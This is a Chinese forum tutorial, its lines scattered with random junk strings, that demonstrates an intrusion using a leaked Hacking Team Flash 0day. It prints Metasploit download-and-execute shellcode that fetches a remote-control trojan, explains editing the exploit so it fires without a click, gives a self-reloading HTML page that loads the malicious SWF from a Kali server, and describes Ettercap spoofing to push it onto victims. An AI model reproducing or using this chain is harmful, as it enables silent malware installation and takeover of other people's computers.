|
/ v9 [+ e7 C0 M8 L3 y) T
三、flash 0day之手工代码修改制作下载者实例入侵演示 ( @8 U' { }# l6 U0 O2 o
, u0 I" Q3 j1 m7 n9 _& G0 c
! w; |+ b+ K) [ q# ~ 利用到的工具: ; ^! r, Q6 ~- }3 ~4 y- Z6 t. Y
; O4 [: H! G5 Y* i
* T, K: s/ W! ?0 I. M2 P
Msf
/ K7 Q2 j( z% D: C
1 B$ c% f! n# {, F6 |' |! y% f: V$ G- I4 f
Ettercap ! m! P N# I) L
. }0 ]3 S7 i' I( K+ D
: i" E( P& E$ G, U0 |; m Adobe Flash CS6
D2 m3 r* [1 z. b u/ w
3 W, \5 q# ^7 Z
" {: O: w# k$ ~2 f Hacking Team Flash 0day-可冲破Chrome沙盒-Evil0X源代码一份
7 G, X# s2 c/ U- A: R! e
/ Y- Z) G* }2 \+ E @ @; P0 Y! l# m: ?* F
下面我们就开始演示入侵,利用msf生成shellcode,首先打开msf执行use windows/download_exec,show options & }' ^7 |, }) Z
( D$ f; T# b% k/ _. W# _
8 m' k3 Z. p" K( y7 E 如图: Q) X; R& N2 \
, ~2 ?# [# e# H
* Q# r# U3 Y8 ^% E% i( @
: K1 j2 s4 M2 R. i) ^. z% \- ?3 { $ l3 p1 ]) h" O9 z N# _, O! \1 a' }7 z
( ]! P; O) n# Q4 ?
2 n/ P$ w( }1 I! g& i2 t
8 x/ \- p$ z B, e+ V' r9 N( o) N, r
! B3 I: l/ {( L+ s 然后set EXE system.exe,再执行set URL,需要说明一下URL就是我们的马的下载地址,这里我们用远控马,远控配置使用不再详细说明。。。如图:
3 ?0 N2 ^ Y% P; L
0 T4 E2 }$ @, K3 ~
2 V2 b0 c6 M& P& x 6 O. t6 }! g, x, R+ q2 v$ V
; b$ Q, K1 E v$ |5 e- R$ I3 {
1 J' u$ @3 q0 }* w4 f
9 C0 V0 j* X* a% g! y
6 R; p* @3 k8 V0 \
' b" s8 s0 C1 L' Y. c 然后执行generate -t dword生成shellcode,如下: 6 t) m* r3 r D" m# G
. w5 c$ k! v9 g
3 }1 H& c# `0 k; K; d+ a
2 `4 h/ M! j( r& J; ] 1 d% C6 g. t* K$ C: Y* @8 U0 i
! q7 d. M( b9 Z+ C
复制代码到文本下便于我们一会编辑flash exp,如下: " Y, P' U% [/ @( k5 l' ], o# [. v8 E
* w _& h. @1 _7 E4 E! {# g2 q
( Q- T2 [% d6 M% b- p0 {$ @6 T 0x0089e8fc, 0x89600000, 0x64d231e5, 0x8b30528b, 0x528b0c52, 0x28728b14, 0x264ab70f, 0xc031ff31, & i, B: N( Q7 [! a
" p" Z& d3 E$ I1 C. u$ J5 M1 J2 `6 }* l! q; I! h
0x7c613cac, 0xc1202c02, 0xc7010dcf, 0x5752f0e2, 0x8b10528b, 0xd0013c42, 0x8578408b, 0x014a74c0, + D" f* W4 C& Q
# }! O& W: M# A9 f9 ?( ~7 ]0 y
: \8 _& f0 }' n& z, K 0x488b50d0, 0x20588b18, 0x3ce3d301, 0x8b348b49, 0xff31d601, 0xc1acc031, 0xc7010dcf, 0xf475e038, 9 s0 T( R3 n4 a; t8 g
4 ]- Q0 p( R% R$ O: h
U3 r* g" F" Q$ o; @$ r 0x3bf87d03, 0xe275247d, 0x24588b58, 0x8b66d301, 0x588b4b0c, 0x8bd3011c, 0xd0018b04, 0x24244489,
, p0 Y! E% r7 g0 `( g8 J/ t
# J, _" }$ \$ `: u% G) Z [9 b" B# x# w# o, A! _
0x59615b5b, 0xe0ff515a, 0x8b5a5f58, 0x5d86eb12, 0x74656e68, 0x69776800, 0xe689696e, 0x774c6854,
! Y2 e2 [* i* G
% w6 I8 Y4 u; y9 K6 l) q9 |! O: J" j$ A/ d
! v$ I" E( O4 ?0 a: H 0xd5ff0726, 0x5757ff31, 0x68565757, 0xa779563a, 0x60ebd5ff, 0x51c9315b, 0x51036a51, 0x53506a51, 4 r" v) u3 i& U7 t6 k, M
" @4 f4 n: ~" [9 {2 @9 X; U' A/ D- t& }
0x89576850, 0xd5ffc69f, 0x31594feb, 0x006852d2, 0x52846032, 0x52515252, 0x55eb6850, 0xd5ff3b2e, 0 b) s1 V, v2 b4 b: O# U) }9 Q
9 _! Z9 w/ `- ?( w) K/ A& S6 u7 a) p. D& m3 t
0x106ac689, 0x3380685b, 0xe0890000, 0x6a50046a, 0x7568561f, 0xff869e46, 0x57ff31d5, 0x56575757,
, F* f! P e$ t 3 E9 v3 _1 |& c$ z8 A
* V; o4 @8 n; k. C
0x18062d68, 0x85d5ff7b, 0x4b1f75c0, 0x007c840f, 0xd1eb0000, 0x00008ee9, 0xfface800, 0x732fffff,
; B$ u5 P0 p) v $ U3 \0 o4 T' }# o8 {2 h
& Q$ P! a' b( |; _ 0x65747379, 0x78652e6d, 0x6beb0065, 0x505fc031, 0x026a026a, 0x6a026a50, 0xda685702, 0xff4fdaf6, & |# _& K% N9 ~
m* T$ s. Z. u! i8 d# j$ ?8 K* z) P* }3 t) M
0xc03193d5, 0x0304b866, 0x8d54c429, 0x3108244c, 0x5003b4c0, 0x12685651, 0xffe28996, 0x74c085d5,
1 W c: ]* b* |" W
( ?# f9 A8 H) W$ Z! |% @8 W% N% R$ D7 m; _" M7 o5 j _7 R( P; \) @
0xc085582d, 0x006a1674, 0x448d5054, 0x53500c24, 0xae572d68, 0x83d5ff5b, 0xceeb04ec, 0x96c66853,
% g0 H4 C E) n; z" f
# H, O+ g/ b; ~; w
% k( P4 @# x0 Q2 I9 ~ 0xd5ff5287, 0x6857006a, 0x876f8b31, 0x006ad5ff, 0xa2b5f068, 0xe8d5ff56, 0xffffff90, 0x74737973, ; J0 [, j- I+ O" N9 ^- O
8 U6 \7 Z' c. A+ i4 ~5 P2 ]1 \
# F' h9 W, L8 s' u. X7 @
0x652e6d65, 0xe8006578, 0xffffff08, 0x2e737378, 0x64696162, 0x6b682e6f, 0x00000000
9 j( F4 o$ a$ b9 k7 \2 E
- [; k0 m/ g# H0 \5 U* t# c! D+ @: i8 h. f, F7 V+ y
" t) L7 @3 t( Q1 Q7 W
" S6 v3 j8 T# @" a% Q" x
% x0 j+ m& L* o+ J + n( A7 B* I. t- f+ w% A/ u
% F" N( M! V8 X. V8 m1 l
" _# `9 l) m- S
下面我们来修改flash 0day exp,需要修改三个文件,分别为:
5 S1 Q8 R! u# s ^) ?. n! B4 S) L" L, S6 r % Y8 m5 I( r; a4 l
+ H* C) c# h8 j6 y. [1 t; ?- D
, C; t3 P! l& C, J. t 3 @# y9 Y( k- F5 k9 a2 M" S
- S9 m$ T2 r% p3 m: ? 先修改ShellWin32.as,部分源代码如图: & S% }2 ~1 X! Q* \
2 V( }4 ~" N3 n4 P
4 Q6 m$ K4 X) Q# e) q9 m9 S2 K6 C
6 }, `3 Z) e3 }# q2 D+ B- |
5 d w' k1 ]6 |9 k1 Z2 R' ~' I5 ^) ^0 ]! e9 S& C1 B8 h$ Z# Q
我们需要把标记处[]中的代码改成用msf生成的代码,修改后如下:
& P: h9 g- `* L( a( S
7 f. B$ O) e! Z* |7 ]/ N/ y# F
6 X4 W+ d3 m W8 @7 X
j4 ~' K1 `/ f
) ~( q6 d! _2 a& j; ?& u" C3 t3 Y
6 Y8 H2 r+ X# b5 _ 然后保存,ShellWin64.as的修改方法如上述,不再演示,下面我们来修改myclass.as,这里需要说明一下,因为此exp生成的利用程序,不能直接自动触发flash漏洞,也就是需要点击按钮才可以,实际上在做渗透的时候需要把它搞得更完美,所以就需要修改,修改方法:搜索myclass的某个字符doc.addchild(btn);如图:
( V/ b6 I* T1 q2 ?- i ! w1 _" A, [# [& `% N( v* M
# S1 O' u8 V, L; ]4 T9 m
& O2 B/ t \! c9 @3 T$ `# s, T
2 S$ O$ ?/ ?! H2 d
9 g) f/ S4 f, u! q# C9 y# D/ n b
换行在后面加一句TryExpl();注意是l不是数字1,然后如图: 8 C3 W) F- i$ G" o3 v
8 h/ u8 k, D/ R+ H
6 {2 y e4 Z. s% L7 U/ j7 W
$ V) P7 h0 I% _. Y* [9 r% i
$ w4 i+ m+ ~+ Q' e
* ?! f! W* Q3 o/ `; x4 G
/ T6 _. ]4 C% a. g! r
+ A$ i. Y# w6 ~4 @6 r8 c, o7 s$ T0 {" ~. g2 V# v
+ E( E* W' l' @& w3 l+ x
2 B- s# m$ S; @3 u) _$ L! x- M6 v: ^; `' B/ [; l( k
然后点保存,下面我们来编译一下,打开
/ Z7 d! c# G# X* h+ Z . G* d: t5 B2 g* j1 d2 _
$ k' {" M" q: y exp1.fla然后点文件-发布,看看编译没错误 ; q2 ]6 Y& S$ N
; w, w% E# Z: O7 V ~; h
. N) w: j& w/ O* j" w ' ^/ g `; m: N; u/ }$ p
) m) `3 C! T. s' A2 I
% r0 B. u7 o, i, {
4 E& H: P/ I$ D
% y$ Y$ ]* n1 r& @; k5 T- E. o# P' o$ K* R& J f" L" c4 C) u8 E A
1 G1 D' ~+ R- b7 S3 e2 w7 e
1 w4 |! y6 @5 S
1 n) ]1 F4 ?" ~( @ ( C% Z, Q' s4 A8 B+ N
~5 E# h7 ^, S( Y
3 L$ W: y0 A& ?
然后我们把生成的 / d* q2 x% U0 M# ~5 e
+ S8 w! u* ^; C( `. g4 T
( Y1 q( n/ q9 \+ O% ^9 u exp1.swf丢到kailinux 的/var/www/html下:
% }% ?' Z e" S, X3 {; W3 E7 X! D ! O$ T0 }% D( a$ s. b
$ S; Y* C* c( }+ ~( ~- v4 h 然后把这段代码好好编辑一下 M% c4 b; W6 z* U
b1 k Y1 z7 a' |2 Y
w- m+ r* C) \- a
3 h1 g* L, @# K8 g9 q
9 X" m& j6 M0 V& M& n7 V- J
* K# b; o* l) F/ t2 I0 `
9 K g7 S3 L$ [0 w) p8 ^; L; `
- g; d5 t7 w! q* m0 m1 S3 X/ f3 e/ u+ n0 E8 O. I$ n# w
5 s. b7 O/ C$ u8 o7 W% F1 o
: i8 W. a. F0 j, H- o1 f5 \. N# v
% P. Y: _6 A8 \* R, ?; `0 y ' x, c& P, A, g* u5 v
) o, ?# a( m, [2 w( t
: U# V& L2 e& T9 G) D8 V * a. r( ^+ n2 o/ [
' l3 p3 ]3 M y3 I. ^
6 n# u$ K( m7 T% l8 [1 f: S
1 f: M& S& R4 x! r
& w/ y2 @* L7 a; T. q3 S" K% Y
: S, b0 D+ b$ `! I! \2 \
<!DOCTYPE html>
9 s5 V1 L$ L6 y; f2 _; Z; r
; m L- }# Y# _) d3 a0 D3 ^+ o7 j
1 ]6 {0 m$ N5 F) U3 s <html>
$ |- W/ j+ X2 j- s6 d 2 C' h8 c T. ~7 S h5 G& I
) i7 E5 j. e- B <head>
% {+ G; A; L' q1 T ( x7 k1 |' j: e( H# i0 I
2 F: x1 E" z3 J {. j+ ~* F3 i
<meta http-equiv="Content-Type" content="text/html; 5 X% Z) i' Z+ I& y
4 [) |( d9 ?% ?
/ k) ^! E. D+ t2 j( D charset=utf-8"/>
2 m& R( Z& m5 d$ I
7 ~( V$ h8 r4 S1 E
0 m" W7 C% x2 I7 L6 z9 Q </head>
/ h2 k( j& ? z' ]4 D& a" ? 2 ^ D6 y% ~$ `9 i8 J9 a
, q3 v6 a8 N: i2 w/ U1 _6 ^ [ <body> * B1 t$ N' p2 H6 X$ j
% i5 C5 K2 r6 Z' I- \% q8 m: \& m! B' H0 i( U J
<h2> Please wait, the requested page is loading...</h2>
1 h, G- x9 G8 Q9 a, s & P2 H( V$ E+ s* n
: C/ J! J7 i' H: q/ p2 E0 }; I <br> 3 l2 a, _! |1 b. f
2 f, _0 u0 a) @% [- [' k! @$ m! g# z6 y. l6 b
<OBJECT
/ ?' y. x6 u& T0 C5 F) ?
$ x" K& x6 i0 t. w3 n
. G1 z% H& m7 D classid="clsid 27CDB6E-AE6D-11cf-96B8-444553540000" WIDTH="50" HEIGHT="50" id="4">< ARAM NAME=movie
: j; r" d e; X; B/ o 2 i8 [" q9 Y, V7 |
9 J1 [0 T* @% p) l
VALUE="http://192.168.0.109/exp1.swf"></OBJECT>
+ p+ P: S5 v3 C4 ?$ W/ R
9 D! A" J& H# S' i% q3 A+ S% w' }% {
</body> 7 g2 l; ?* x: m H
; [# {8 v# ?1 h/ _5 O; h# M5 b5 V
! L+ b" B( l! }5 W: g <script>
% Y3 A$ T$ F8 U1 `+ ^ ) Q0 h6 {+ M& w+ T
* I0 K; b u8 G" e setTimeout(function () { 6 k1 w& Y* h' q4 F
) Q9 b' y% W# R, Q: y4 n5 Z! y/ Z
# b% ]5 [% m0 G 7 i8 Q+ ^* K+ X8 ]! b
- `- c! Z# @( w4 {
" U/ n$ E* N1 X5 a* h window.location.reload();
I* R8 Z I* M( L6 u3 ?
2 E' @, K4 U6 M- S
+ h8 v- H2 }6 t2 n4 P, w' t }, 10000); 0 m: U/ K5 A9 G# M+ B) a# d
" d: i# _6 c5 C% b& |& N
- t3 z8 k& p4 o- d- u G
0 S8 _: g7 n0 P! m3 ?1 N 3 S! H- F* T, `+ h( T* g% t
4 d0 {' I! C$ u3 q5 ~/ S C7 _- D </script>
! A6 V/ u1 a3 n/ f, ^0 b, l 0 l( f$ b3 c; e# m: B. l8 b
4 p* ?$ K$ N. q' Z
</html> 5 m" v8 a8 U7 i4 l+ K' Z! ~
% ]4 L, g: |3 T( }# `3 q! K4 ]# J
4 C% j) S7 N b4 W, z
4 I, u0 U$ M( U; k; n 8 E0 o- U$ u- v" P3 f, P( R0 E
! j6 x, }. ]0 _% } q
注意:192.168.0.109是kali的ip地址,这时候我们需要service apache2 start启动一下web服务,然后将上面的html保存为index.htm同样丢到kali web目录下,测试访问链接存在如图: 0 X+ G8 u. S. H7 l2 j+ y# u
) n2 I8 B7 |+ x) q' V" S, \1 p/ J" P
3 t- \6 G9 _: H; b' | e8 I Q
- s; K- d9 m' @" F# C( `
2 l; ?8 j2 b) a+ @. o; y: W7 ]
( ?7 D; k' n# V5 m
9 V' V4 m) O4 w/ W! [( b0 N x
% E) n2 n: C ]! ]3 I* G
# ]3 x3 z3 l7 m0 T% B* H y
3 i1 k( t+ X# @4 C0 B9 m4 H
. ?0 f5 L3 k- }' k: {2 I. O3 }" d) q6 `3 c+ b
z" L8 o; u& j! m * L, ?, d" K; p- a' ^
. x0 O: M% s4 q+ `6 } + R& k2 Y) `+ S% m z
% C+ r9 |( D% l1 s2 j# a& a" G F( h' v. H5 F, D, t
下面我们用ettercap欺骗如图:
) l- J0 c/ ?: K1 g
: u3 Y! e" ^- i" I; \! q3 q& |# j5 R: J
3 d6 K; S- w, W% R. i" N/ L; ?6 ^$ _1 {
8 ]5 R' \& @7 I' R4 Z
; H; T; [; A0 F/ k$ Y 4 \& L6 q6 o F+ C% j
9 g. D, ] v9 D7 o/ P9 W
* [" D+ C3 s! T) L; k 下面我们随便访问个网站看看:
. G2 b0 _- g9 O # r; F% ^( N; D; M
9 r! q& F/ m) k y7 k0 R- A b 我靠我发现直接用ettercap欺骗物理机装了腾讯管家照样可以欺骗成功,如图:
* Z3 j1 P/ c, T% e; k2 _
, g* I! J1 c' ~( F4 x0 C- K/ e; I a8 G3 |
; |% G4 v, D/ B @" O7 j! \) Y
; H0 e% X8 E' c# X) m$ c
* Z; N. v' x' x e. d9 Q+ } 我们看另一台,
# ], J# r4 u$ c) P2 n) p) w
& J' `% P z* M, U/ e
8 J! n o1 w+ k4 k! t 提示这个错误,说明木马是成功被下载执行了, 只是由于某些原因没上线而已。。。
9 a# a# v8 t: Z# ~3 y7 { |